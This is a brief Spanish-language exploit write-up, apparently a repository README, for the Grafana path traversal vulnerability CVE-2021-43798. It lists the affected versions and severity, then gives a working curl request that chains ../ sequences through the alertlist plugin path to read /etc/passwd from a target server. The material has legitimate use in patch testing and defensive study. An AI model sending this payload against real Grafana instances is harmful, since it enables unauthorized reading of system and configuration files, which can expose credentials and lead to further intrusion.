
Exploit para el recorrido de directorios de Grafana (CVE-2021-43798) que permite la lectura no autorizada de archivos mediante solicitudes HTTP manipuladas.
Versiones afectadas: Grafana 8.0.0-beta1 a 8.3.0 (excepto versiones parcheadas)
Tipo de vulnerabilidad: Directory Traversal (Recorrido de directorio)
Gravedad: Crítica
Plataforma: Grafana (plataforma de monitoreo y observabilidad de código abierto)
⚠️ Detalles de la vulnerabilidad En Grafana, se puede realizar un recorrido de directorio a través de la siguiente URL:
Code http://<grafana_host>/public/plugins// A través de esto, un atacante puede leer archivos locales en el servidor. Por ejemplo, acceso no autorizado a /etc/passwd o archivos de configuración.
🔥 Ejemplo de explotación Lectura de archivo mediante una solicitud simple:
bash curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd Mediante la solicitud anterior, se puede obtener la lista de usuarios del sistema Linux.